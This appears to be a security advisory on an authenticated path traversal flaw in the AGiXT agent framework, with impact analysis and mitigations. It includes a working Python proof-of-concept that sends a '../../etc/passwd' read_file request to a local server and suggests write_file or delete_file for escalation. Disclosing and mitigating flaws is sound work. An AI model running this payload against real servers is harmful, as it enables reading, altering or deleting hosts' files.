AGiXT versions up to and including 1.9.1 expose servers to an authenticated path traversal attack. An attacker with a valid API key can bypass the agent’s workspace sandbox and read, write, or delete any file the AGiXT process can access on the host. The flaw sits in the essential_abilities extension’s safe_join() function and turns a tool meant for safe file operations into a backdoor for filesystem control.

The vulnerability chains through three code points: it starts at agixt/endpoints/Extension.py:165, hops to agixt/XT.py:1035, and sinks in agixt/extensions/essential_abilities.py:436. There, os.path.normpath(os.path.join(self.WORKING_DIRECTORY, *paths.split("/"))) naively joins user-supplied paths without checking if the result stays inside the workspace directory. Classic directory traversal payloads like ../../etc/passwd escape containment effortlessly.
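The join-then-normalize pattern quoted above can be reproduced in isolation. The sketch below is not AGiXT's code: the `unsafe_join` helper and the `/srv/workspace` directory are hypothetical names chosen for illustration, and `posixpath` is used so the result is the same on any platform.

```python
import posixpath

# Hypothetical workspace location, chosen only for illustration.
WORKING_DIRECTORY = "/srv/workspace"


def unsafe_join(working_directory: str, paths: str) -> str:
    """Join and normalize a user-supplied path with no containment check."""
    return posixpath.normpath(
        posixpath.join(working_directory, *paths.split("/"))
    )


# A well-behaved path stays inside the workspace.
print(unsafe_join(WORKING_DIRECTORY, "notes/todo.txt"))    # /srv/workspace/notes/todo.txt

# Each ".." climbs one level, so normalization lands outside the workspace.
print(unsafe_join(WORKING_DIRECTORY, "../../etc/passwd"))  # /etc/passwd
```

Normalization collapses the `..` segments but never asks whether the result still lives under the workspace, and that missing check is the whole bug. The number of `..` segments an attacker needs depends on how deep the real workspace sits.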



Proof of Concept

Tested on AGiXT 1.9.1, the exploit requires only a bearer token for an agent. Install via pip install agixt==1.9.1, spin up the default server on port 7437, and fire this Python script:

    import requests

    BASE = "http://localhost:7437"
    TOKEN = ""  # Your API token here

    headers = {"Authorization": f"Bearer {TOKEN}"}

    # The traversal payload goes in the filename argument of read_file.
    payload = {
        "command_name": "read_file",
        "command_args": {
            "filename": "../../etc/passwd"
        }
    }

    r = requests.post(f"{BASE}/api/agent/MyAgent/command", json=payload, headers=headers)
    print(r.text)  # Dumps /etc/passwd contents

The output lists the host's user accounts, with entries like root:x:0:0:root:/root:/bin/bash. Swap read_file for write_file or delete_file to escalate.

Impact and Why It Matters

AGiXT is an open-source Python framework for building AI agents that interact with tools, LLMs, and environments. It gained traction in 2023-2024 amid the agentic AI hype, with over 2,000 GitHub stars by mid-2024. Developers run it locally or on a VPS to prototype autonomous systems, often with access to codebases, API keys, or cloud creds. This vuln gives any API key holder file operations with the full privileges of the AGiXT process (root-level, if the server runs as root), with no further privilege escalation needed.

Implications hit hard. Account enumeration via /etc/passwd, plus theft of SSH keys in ~/.ssh/ or secrets stored in docker-compose.yml, leads straight to lateral movement. Attackers can overwrite binaries for persistence or delete logs for cover. In production, where AGiXT might manage real workflows, this enables ransomware or data exfil. Authentication is “just” an API key, often generated per agent and shared in docs or repos, which is a low barrier for insiders or anyone holding a leaked token.

Compare to similar flaws: think of it as a filesystem-focused cousin of Log4Shell for AI tooling, with the important difference that this one requires authentication. Past vulns in LangChain or AutoGPT showed agent frameworks lag on input sanitization. AGiXT’s workspace was meant to sandbox tools, but broken path joining nullifies it. A skeptic would note that AGiXT targets tinkerers, not enterprises, so exposure skews toward devs’ machines. Still, unpatched instances are sitting ducks, especially once scans of public repos and hosts turn up exposed deployments.

Mitigate now: Upgrade beyond 1.9.1 and check the releases for patches, as the advisory rates this High severity. Run in containers with read-only filesystems or seccomp profiles. Revoke API keys, audit agent permissions, and validate all paths server-side with os.path.realpath() and prefix checks. For Njalla users: Scan your AI stacks with tools like Trivy or Grype; agent frameworks multiply attack surface in crypto ops or finance bots.
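As a rough illustration of the realpath-plus-prefix check, here is a minimal sketch. It is not the upstream AGiXT patch: the function name `safe_join_checked` and its signature are assumptions made for this example. It resolves both paths first, then uses `os.path.commonpath` rather than a raw string prefix test, so a sibling directory such as `/srv/workspace-evil` cannot pass as being inside `/srv/workspace`.

```python
import os


def safe_join_checked(base_dir: str, user_path: str) -> str:
    """Resolve user_path under base_dir and refuse anything that escapes it.

    Hypothetical helper for illustration; not AGiXT's actual fix.
    """
    # Resolve symlinks and ".." segments on both sides before comparing.
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))

    # commonpath compares whole path components, not raw string prefixes.
    if os.path.commonpath([base, candidate]) != base:
        raise PermissionError(f"path escapes workspace: {user_path!r}")
    return candidate
```

Called with `"../../etc/passwd"`, or with an absolute path like `"/etc/passwd"`, the helper raises `PermissionError` instead of returning a path outside the workspace. A check like this still leaves a window between validation and file access, so it complements container isolation and does not replace it.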

Bottom line: This underscores AI dev tools’ rush to features over security. File access is table stakes for agents, but without real sandboxing, they weaponize themselves. Patch, isolate, and audit—before your agent turns rogue.